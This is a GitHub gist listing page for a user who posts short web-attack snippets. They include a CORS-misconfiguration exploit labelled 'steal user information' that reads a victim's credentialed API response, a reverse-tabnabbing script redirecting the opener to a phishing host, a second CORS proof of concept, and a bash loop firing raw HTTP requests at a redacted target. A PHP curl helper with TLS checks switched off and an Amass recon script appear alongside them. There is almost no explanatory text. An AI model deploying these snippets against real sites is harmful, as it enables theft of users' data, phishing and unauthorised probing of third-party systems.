Šimkevičius Hug devhug
devhug
/ exploit.html
Created
August 7, 2021 18:04
Cross-origin resource sharing misconfig | steal user information
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <script> | |
| var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://redacted.com/api/users/number',true); req.withCredentials = true; req.send('{}'); function reqListener() { alert(this.responseText); }; | |
| </script> | |
| </html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function get_contents($url){ | |
| $ch = curl_init("$url"); | |
| curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
| curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
| curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); | |
| curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
| curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
| curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']); | |
| curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| RED=$(tput setaf 1) | |
| GREEN=$(tput setaf 2) | |
| BLUE=$(tput setaf 4) | |
| RESET=$(tput sgr0) | |
| AMASS_VERSION=3.8.2 | |
devhug
/ exploit.html
Created
August 10, 2021 19:09
Reverse Tabnabbing Web Attack | OWASP Foundation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| if (window.opener) window.opener.parent.location.replace('http://phishing.com'); | |
| if (window.parent != window) window.parent.location.replace('http://phishing.com'); | |
| </script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <body> | |
| <h2>CORS PoC</h2> | |
| <div id="demo"> | |
| <button type="button" onclick="cors()">Exploit</button> | |
| </div> | |
| <script> | |
| function cors() { | |
| var xhr = new XMLHttpRequest(); | |
| xhr.onreadystatechange = function() { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| while true | |
| do | |
| printf 'GET /?file=127.0.0.1 HTTP/1.1\r\n'\ | |
| 'Host: redacted.com\r\n'\ | |
| 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n'\ | |
| 'Accept: */*\r\n'\ | |
| 'Accept-Language: en-US,en;q=0.5\r\n'\ | |
| 'Accept-Encoding: gzip, deflate\r\n'\ |